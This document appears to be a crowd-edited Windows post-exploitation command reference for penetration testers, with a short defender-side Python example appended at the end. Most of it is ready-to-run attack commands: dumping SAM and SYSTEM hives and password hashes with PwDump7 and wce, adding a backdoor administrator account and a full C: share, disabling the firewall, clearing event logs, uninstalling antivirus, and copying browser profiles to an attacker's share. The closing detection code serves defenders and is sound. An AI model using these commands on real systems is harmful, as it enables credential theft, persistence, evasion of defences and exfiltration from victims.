Windows Post-Exploitation Command List

If for any reason you cannot access/edit these files in the future, please contact mubix@hak5.org. You can download these files in any format using Google Docs’ File > Download As method. If you are viewing this on anything other than Google Docs then you can get access to the latest links to the Linux/Unix/BSD, OSX, Obscure, Metasploit, and Windows docs here: http://bit.ly/nuc0N0

DISCLAIMER: Anyone can edit these docs, and all that entails and implies.

Windows Post Exploitation Command List - Page: 1

Table of Contents

Blind Files
Non Interactive Command Execution
System
Networking (ipconfig, netstat, net)
Configs
Finding Important Files
Files To Pull (if possible)
Remote System Access
Auto-Start Directories
WMI
Reg Command
Deleting Logs
Uninstalling Software “AntiVirus” (Non interactive)
# Other (to be sorted)
OS SPECIFIC
    Win2k3
    Vista/7
    Vista SP1/7/2008/2008R2 (x86 & x64)
Invasive or Altering Commands
Support Tools Binaries / Links / Usage
Third Party Portable Tools
Useful Meterpreter Post Modules
Useful Multi-Step Techniques

Blind Files (Things to pull when all you can do is to blindly read) LFI/Directory traversal(s). Files that will have the same name across networks / Windows domains / systems.

File / Expected Contents / Description
%SYSTEMDRIVE%\boot.ini
    A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini
    This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
    It stores users' passwords in a hashed format (in LM hash and NTLM hash).
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
>insert new rows above this line<
SEE IMPORTANT FILES SECTION FOR MORE IDEAS

Non Interactive Command Execution

System

Command / Expected Output or Description
whoami
    Lists your current user. Not present in all versions of Windows, however shall be present in Windows NT 6.0-6.1.
whoami /all
    Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
set
    Shows all current environmental variables. Specific ones to look for are USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE.
systeminfo (XP+)
    Outputs a large amount of data about the system, including hostname, network interface config, domain, time zone, and hotfixes installed.
qwinsta (2000/NT4 with Terminal Services, XP and above)
    Displaying information about RDP sessions. It has username, session id, login method, and logon server. /CONNECT can be added, but usually not needed to gain the information you need. Lists Terminal Services servers.
qprocess *
    Much like tasklist, but a bit easier to read, with pid and binary name.
at
    Shows currently scheduled tasks via ‘at’. Even though schtasks is the new way of doing things admin wise, pentesters can still use ‘at’ to get system level shells even through Win7x64 systems.
schtasks (XP+)
    Lists all the currently scheduled tasks that your current user has access to see. Each user can have their own scheduled tasks now. This is the big deviation from ‘at’.
schtasks /query /fo csv /v > %TEMP%
    Outputs the list of services in verbose csv format. Good for throwing in temp and pulling down for a closer look.
net start OR sc query
    Lists services
sc getkeyname “XXXXX”
    You can use the name you got from ‘net start’ to get the ‘key name’ of the service you want more information on.
sc queryex “XXXXX”
    Using the keyname you achieved from ‘getkeyname’, you can query the status, pid and other information about the service.
net config workstation
    This will display information such as NetBIOS name, the full computer name, Username (of the user executing this command), Domain, Workgroups, and more.
net time
net file
net session
net use
    Used to map network shares, such as the C:\ drive.

tasklist (XP+)
    Is equivalent to using Taskmanager, though visible as console output instead with PID’s too.
tasklist /m or tasklist /m blah.dll
    Lists all of the ‘modules’ (binary (exe, dll, com or any other PE based code that was executed) for each process, or if a module is specified then tasklist will only list the processes with that specific module running. Great for finding processes running crypto or other specific function dlls.
tasklist /svc
    Lists processes and their accompanying service keyname if they are parented by a service
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>
    Kill processes by name or pid (with force option)
fsutil fsinfo drives
    Must be an administrator to run this, but it lists the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
    Locates insecurely registered executables within the system registry on Windows 7.

Networking (ipconfig, netstat, net)

Command / Expected Output or Description
ipconfig /all
    Displays the full information about your NIC’s.
ipconfig /displaydns
    Displays your local DNS cache.
netstat -nabo
    XP and up for -o flag to get PID
netstat -s -p [tcp|udp|icmp|ip]
netstat -r
netstat -na | findstr :445
netstat -nao | findstr LISTENING
    XP and up for -o flag to get PID
netstat -na | findstr LISTENING
netsh diag show all
net view
    Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup.
net view /domain
net view /domain:otherdomain
net user %USERNAME% /domain
    Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership.
net user /domain
    Lists all of the domain users
net accounts
    Prints the password policy for the local system. This can be different and superseded by the domain policy.
net accounts /domain
    Prints the password policy for the domain

net localgroup administrators
    Prints the members of the Administrators local group
net localgroup administrators /domain
    As this was supposed to use localgroup & domain, this is actually another way of getting *current* domain admins
net group “Domain Admins” /domain
    Prints the members of the Domain Admins group
net group “Enterprise Admins” /domain
    Prints the members of the Enterprise Admins group
net group “Domain Controllers” /domain
    Prints the list of Domain Controllers for the current domain
nbtstat -a [ip here]
net share
    Displays your currently shared SMB entries, and what path(s) they point to.
net session | find / “\\”
arp -a
    Lists all the systems currently in the machine’s ARP table.
route print
    Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
browstat (Not working on XP)
● http://www.securityaegis.com/ntsd-backdoor/

Configs

Command / Expected Output or Description
gpresult /z
    Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc qc
sc query
sc queryex
type %WINDIR%\System32\drivers\etc\hosts
    Print the contents of the Windows hosts file
dir %PROGRAMFILES%
    Prints a directory listing of the Program Files directory.
echo %COMSPEC%
    Usually going to be cmd.exe in the Windows directory, but it’s good to know for sure.

Finding Important Files

Command / Description / Reason
tree C:\ /f /a > C:\output_of_tree.txt
    Prints a directory listing in ‘tree’ format. The /a makes the tree printed with ASCII characters instead of special ones and the /f displays file names as well as folders
dir /a
dir /b /s [Directory or Filename]
dir \ /s /b | find /I “searchstring”
    Searches the output of dir from the root of the current drive (\) and all sub directories (/s) using the ‘base’ format (/b) so that it outputs the full path for each listing, for ‘searchstring’ anywhere in the file name or path.
command | find /c /v “”
    Counts the lines of whatever you use for ‘command’

Files To Pull (if possible)

File location / Description / Reason
%SYSTEMDRIVE%\pagefile.sys
    Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software

%WINDIR%\repair\security
%WINDIR%\iis6.log (5, 6 or 7)
%WINDIR%\system32\logfiles\httperr\httperr1.log
    IIS 6 error log
%SystemDrive%\inetpub\logs\LogFiles
    IIS 7’s logs location
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts

Remote System Access

Command / Description / Reason
net share \\computername
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername
    This maps IPC$ which does not show up as a drive but allows you to access the remote system as the current user. This is less helpful as most commands will automatically make this connection if needed
net use \\computername /user:DOMAIN\username password
    Using the IPC$ mount with a user name and password allows you to access commands that do not usually ask for a username and password as a different user in the context of the remote system. This is useful when you’ve gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Enable remote desktop.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    Enable remote assistance
● net time \\computername (Shows the time of target computer)
● dir \\computername\share_or_admin_share\ (dir list a remote directory)
● tasklist /V /S computername
    ○ Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount

Auto-Start Directories
● ver (Returns kernel version, like uname on *nix)
Windows NT 6.1, 6.0
    %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
Windows NT 5.2, 5.1, 5.0
    %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
Windows 9x
    %SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\
Windows NT 4.0, 3.51, 3.50
    %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

WMI
● wmic bios
● wmic qfe
● wmic qfe get hotfixid (This gets patches IDs)
● wmic startup
● wmic service
● wmic os
● wmic process get caption,executablepath,commandline
● wmic process call create “process_name” (executes a program)
● wmic process where name=”process_name” call terminate (terminates program)
● wmic logicaldisk where drivetype=3 get name, size, freespace, filesystem, volumeserialnumber (hard drive information)
● wmic useraccount (usernames, sid, systemname, and various security related goodies)
● wmic useraccount get /ALL
● wmic share get /ALL (you can use ? for gets help !)
● wmic startup list full (this can be a huge list!!!)
● wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)
● exit

Reg Command
● reg save HKLM\Security security.hive (Save security hive to a file)
● reg save HKLM\System system.hive (Save system hive to a file)
● reg save HKLM\SAM sam.hive (Save sam to a file)
● reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
● reg export [RegDomain]\[Key] [FileName]
● reg import [FileName ]
● reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can add /s to recurse all values)

Deleting Logs
● wevtutil el (list logs)
● wevtutil cl <LogName> (Clear specific log)
● del %WINDIR%\*.log /a /s /q /f

Uninstalling Software “AntiVirus” (Non interactive)
● wmic product get name /value (this gets software names)
● wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)

# Other (to be sorted)
● pkgmgr usefull /iu :”Package”
● pkgmgr usefull /iu :”TelnetServer” (Install Telnet Service ...)
● pkgmgr /iu:”TelnetClient” (Client)
● rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
● wscript.exe <script js/vbs>
● cscript.exe <script js/vbs/c#>
● xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff

OS SPECIFIC

Win2k3
● winpop stat domainname

Vista/7
● winsat features
● wbadmin get status
● wbadmin get items
● gpresult /H gpols.htm
● bcdedit /export <filename>

Vista SP1/7/2008/2008R2 (x86 & x64)
Enable/Disable Windows features with Deployment Image Servicing and Management (DISM):
*Note* Works well after bypassuac + getsystem (requires system privileges)
*Note2* For Dism.exe to work on x64 systems, the long commands are necessary
To list features which can be enabled/disabled:
● %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features
To enable a feature (TFTP client for example):
● %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP
To disable a feature (again TFTP client):
● %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP

Invasive or Altering Commands
These commands change things on the target and can lead to getting detected

Command / Description
net user hacker hacker /add
    Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’

net localgroup administrators /add hacker or net localgroup administrators hacker /add
    Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited
    Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive. One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added ourselves as a local admin this isn’t a problem but it is something to keep in mind
net user username /active:yes /domain
    Changes an inactive / disabled account to active. This can be useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable
    Disables the local windows firewall
netsh firewall set opmode enable
    Enables the local windows firewall. If rules are not in place for your connection, this could cause you to lose it.

Support Tools Binaries / Links / Usage

Command / Link to download / Description

Third Party Portable Tools (must be contained in a single executable)

REMEMBER: DO NOT RUN BINARIES YOU HAVEN’T VETTED. BINARIES BELOW ARE NOT BEING VOUCHED FOR IN ANY WAY AS THIS DOCUMENT CAN BE EDITED BY ANYONE

Command / Link to download
carrot.exe /im /ie /ff /gc /wlan /vnc /ps /np /mp /dialup /pwdump
    http://h.ackack.net/carrot-exe.html
PwDump7.exe > ntlm.txt
    http://www.tarasco.org/security/pwdump_7/
nircmd.exe
    http://www.nirsoft.net/utils/nircmd.html
wce.exe
    http://www.ampliasecurity.com/research/wce_v
adfind.exe -b ou=ActiveDirectory,dc=example,dc=com -f "objectClass=user" sn givenName samaccountname -nodn -adcsv > exported_users.csv
    http://www.joeware.net/freetools/
Various tools (e.g. \\hackarmoury.com\tools\all_binaries\fgdump.exe)
    Some examples of protocols in use: http://hackarmoury.com/tools, \\hackarmoury.com\tools, ftp://hackarmoury.com, svn://hackarmoury.com, http://ipv6.hackarmoury.com (IPv6 ONLY)
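Defender-side view of the "Invasive or Altering Commands" and "Deleting Logs" sections above, as an added example that is not part of the original command list: the Python below maps the Windows audit events those commands leave behind (4720 account created, 4732 member added to a local group, 5142 share created, 4698 scheduled task created, 1102 Security audit log cleared, 104 other log cleared) back to the commands, and flags the create-user / add-to-administrators / share-drive sequence when all three land on one host inside a short window. It assumes events have already been collected and normalised into dicts with time, host, event_id, subject and target; the SAMPLE_EVENTS are constructed for the demo and the five-minute window is an arbitrary choice, not something the document states.

```python
"""Added example (not from the original command list): mapping the 'Invasive or
Altering Commands' and 'Deleting Logs' entries to the Windows audit events they
generate, and correlating the create/elevate/share sequence per host.

Assumptions (labelled): events arrive as dicts with integer 'time' (epoch
seconds), 'host', 'event_id' and optional 'subject'/'target' strings, produced
by whatever collector is in use. SAMPLE_EVENTS below are constructed for the
demo. The event IDs require the matching audit policy to be enabled.
"""
from collections import defaultdict

# Event ID -> meaning, tied to the commands listed in the sections above.
RULES = {
    4720: "local user account created (net user <name> <pw> /add)",
    4732: "member added to a local security group (net localgroup administrators ... /add)",
    5142: "network share created (net share name$=C:\\ ...)",
    4698: "scheduled task created (at / schtasks)",
    1102: "Security audit log cleared (wevtutil cl Security)",
    104:  "event log file cleared, logged to System (wevtutil cl <LogName>)",
}

# The create -> elevate -> share sequence from the 'hacker' rows, in order.
CHAIN = (4720, 4732, 5142)
CHAIN_WINDOW_SECONDS = 300  # arbitrary correlation window for the demo


def match_events(events):
    """Return one alert dict per event whose ID is in RULES, in input order."""
    alerts = []
    for ev in events:
        desc = RULES.get(ev["event_id"])
        if desc is None:
            continue  # routine event (logons etc.), not one of interest here
        alerts.append({
            "time": ev["time"],
            "host": ev["host"],
            "event_id": ev["event_id"],
            "description": desc,
            "subject": ev.get("subject"),
            "target": ev.get("target"),
        })
    return alerts


def find_account_chains(events, window=CHAIN_WINDOW_SECONDS):
    """Per host, find the CHAIN event IDs in order within `window` seconds.

    A lone 4720 is noise on a busy domain; 4720 -> 4732 -> 5142 on one host in a
    few minutes is the exact footprint of the rows above and worth an alert.
    """
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        per_host[ev["host"]].append(ev)

    hits = []
    for host, evs in per_host.items():
        stage, start = 0, None  # index of the next CHAIN stage we expect
        for ev in evs:
            if ev["event_id"] != CHAIN[stage]:
                continue
            if stage == 0:
                start = ev["time"]
            elif ev["time"] - start > window:
                stage, start = 0, None  # too slow; wait for a fresh 4720
                continue
            stage += 1
            if stage == len(CHAIN):
                hits.append({"host": host, "start": start, "end": ev["time"]})
                stage, start = 0, None
    return hits


# Constructed sample: WS01 shows the full chain and a later log wipe; SRV02
# shows an ordinary account creation that is too slow to form a chain.
SAMPLE_EVENTS = [
    {"time": 1000, "host": "WS01", "event_id": 4624, "subject": "alice"},
    {"time": 1010, "host": "WS01", "event_id": 4720, "subject": "alice", "target": "hacker"},
    {"time": 1015, "host": "WS01", "event_id": 4732, "subject": "alice", "target": "Administrators"},
    {"time": 1020, "host": "WS01", "event_id": 5142, "subject": "alice", "target": "\\\\*\\nothing$"},
    {"time": 1400, "host": "WS01", "event_id": 1102, "subject": "hacker"},
    {"time": 2000, "host": "SRV02", "event_id": 4720, "subject": "svc-hr", "target": "newhire"},
    {"time": 2900, "host": "SRV02", "event_id": 4732, "subject": "svc-hr", "target": "Remote Desktop Users"},
]


def main():
    for alert in match_events(SAMPLE_EVENTS):
        print("{time} {host} {event_id}: {description} (by {subject})".format(**alert))
    for hit in find_account_chains(SAMPLE_EVENTS):
        print("CHAIN on {host}: create/elevate/share between t={start} and t={end}".format(**hit))


if __name__ == "__main__":
    main()
```

Run as-is to see six single-event alerts and one chain hit for WS01; SRV02's 4720/4732 pair is 900 seconds apart and so is reported individually but not as a chain. Feed match_events and find_account_chains your own normalised event stream in place of SAMPLE_EVENTS; the per-host ordering and the window are the two knobs that decide how noisy the chain rule is.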

